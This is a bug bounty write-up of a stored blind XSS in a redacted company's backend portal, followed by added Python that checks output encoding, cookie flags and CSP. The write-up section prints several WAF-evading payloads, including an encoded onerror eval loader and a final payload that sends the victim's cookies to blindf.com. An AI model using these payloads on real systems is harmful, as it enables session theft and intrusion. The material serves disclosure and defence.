Blind XSS (A mind game to win the battle)
In this write-up, I will explain how I exploited a blind XSS in the backend portal of a program.
I will not take much time and will keep the write-up simple and to the point.
It was a private program, so we will call it https://redacted.com.
I used https://blindf.com to exploit it. It's a platform/tool/framework for finding blind XSS.
Attack Starts:
1. Found a form on https://redacted.com
2. I put a BHTML payload + BXSS payload in the text field
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"></script><script src=https://blindf.com/bx.php></script>
Result: The WAF stopped me from submitting the form.
3. I removed the BXSS payload. Now the payload was:
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>
Result: The WAF did not stop me and I successfully submitted the form. The next day Blindf confirmed the BHTML payload execution in the backend. Now it was time to submit the BXSS payload, because I knew that the backend portal was vulnerable and I just had to submit the BXSS payload.
4. Next payload used: BHTML + BXSS
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"><svg onload='with(top)body.appendChild(createElement("script")).src="https://blindf.com/bx.php"'>
Result: The WAF did not stop me and I successfully submitted the payload. But again only the BHTML payload worked and the BXSS did not. Now, again, it was time to modify the payload.
5. Next payload used: BHTML + BXSS
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"> sfds"><base href="https://blindf.com"><script nonce='secret' src='./bx.php'></script>
Result: The WAF stopped me and I could not submit the form. Frustration was at its peak. Again it was time to change the payload.
6. Next payload used: BHTML + BXSS
Payload:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmxpbmRmLmNvbS9ieC5waHAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
Result: Bypassed the WAF, but again only BHTML worked and BXSS failed. Now it was not the time for payload modification but for thinking about the situation.
Situation step by step:
- I used BHTML + BXSS payloads.
- Some BXSS payloads bypassed the WAF but did not execute in the backend portal, whereas the BHTML payloads were going through fine and I was receiving responses from my BHTML payloads.
- Maybe something was stopping my remote JS file from executing. [CORS or Same-origin policy]
- So I had to execute BXSS without including a remote JS file.
- But how could I confirm the payload execution in the backend if I just showed an alert popup to them?
- The “<img” tag was working but I could not include a remote JS file.
- I had to make a payload that could respond back and confirm JS code execution.
7. Now it was time to modify the payload and attack again.
Payload used:
<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"> <img src=https://blindf.com/a.jpg onload=this.src='https://blindf.com/oc.php/?c='+document.cookie>
Result: WAF bypassed. BHTML payload executed. BXSS payload executed and I got the cookie value.
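The chain above breaks at three places a backend portal controls: the form input was rendered as markup instead of text, the session cookie was readable from document.cookie, and whatever blocked the remote script file still let an inline onload handler run. The following Python is an added example written for this write-up, not code from the author or from Blindf; the sample submissions, the callback.example hostname, the cookie values and the CSP strings are all constructed for the example and stand in for the redacted ones.

```python
"""Defensive checks for the stored blind-XSS pattern in this write-up.

Three controls that each stop the chain described above:
  1. output encoding: untrusted form input is rendered as text, never markup
  2. cookie flags: HttpOnly keeps the session cookie out of document.cookie
  3. CSP: a script-src without 'unsafe-inline' blocks inline event handlers
     such as the img onload used in the final payload
Every value below is constructed for the example (callback.example is a
placeholder for the callback host, not a real endpoint).
"""
import html
from html.parser import HTMLParser

# Constructed samples shaped like the submissions in the write-up.
SAMPLE_SUBMISSIONS = [
    '<img src="https://callback.example/b.php?c=bhtml"/>',
    '"><img src=https://callback.example/a.jpg '
    "onload=this.src='https://callback.example/oc.php/?c='+document.cookie>",
    'just a normal comment',
]


def render_untrusted(text: str) -> str:
    """Encode form input before placing it in the portal's HTML.

    quote=True also encodes " and ', which is what neutralises the
    attribute break-out ("> ) that every payload above relies on.
    """
    return html.escape(text, quote=True)


class _TagCollector(HTMLParser):
    """Collects the start tags a browser would create from a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def markup_elements(fragment: str) -> list:
    """Return the (tag, attributes) pairs parsed from an HTML fragment."""
    collector = _TagCollector()
    collector.feed(fragment)
    return collector.tags


def cookie_missing_flags(set_cookie: str) -> list:
    """List the hardening attributes absent from a Set-Cookie header value.

    Without HttpOnly, document.cookie exposes the session token to any
    script that runs in the portal, which is exactly what the final
    payload read.
    """
    attrs = {part.strip().split("=")[0].lower()
             for part in set_cookie.split(";")[1:]}
    wanted = ["httponly", "secure", "samesite"]
    return [flag for flag in wanted if flag not in attrs]


def csp_allows_inline_handlers(policy: str) -> bool:
    """True if inline event handlers (onload=, onerror=) may run under this CSP.

    Simplified model: script-src falls back to default-src; 'unsafe-inline'
    is ignored when a nonce or hash source is present (CSP level 3).
    'unsafe-hashes' is not modelled.
    """
    directives = {}
    for directive in policy.split(";"):
        parts = directive.strip().split()
        if parts:
            directives[parts[0].lower()] = [s.lower() for s in parts[1:]]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True  # nothing governs scripts, so inline handlers run
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
        for s in sources
    )
    return "'unsafe-inline'" in sources and not has_nonce_or_hash


if __name__ == "__main__":
    for submission in SAMPLE_SUBMISSIONS:
        raw = markup_elements(submission)
        safe = markup_elements(render_untrusted(submission))
        print(f"raw elements={len(raw)} encoded elements={len(safe)}")
    print(cookie_missing_flags("session=abc123; Path=/"))
    print(csp_allows_inline_handlers("script-src 'self' 'unsafe-inline'"))
```

Run as a script it shows each sample producing an element when rendered raw and none once encoded, lists the flags missing from a bare session cookie, and flags a CSP that would still let an inline onload handler execute even though it blocks remote script files.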
Severity: Critical (9 ~ 10)
Bounty: $1000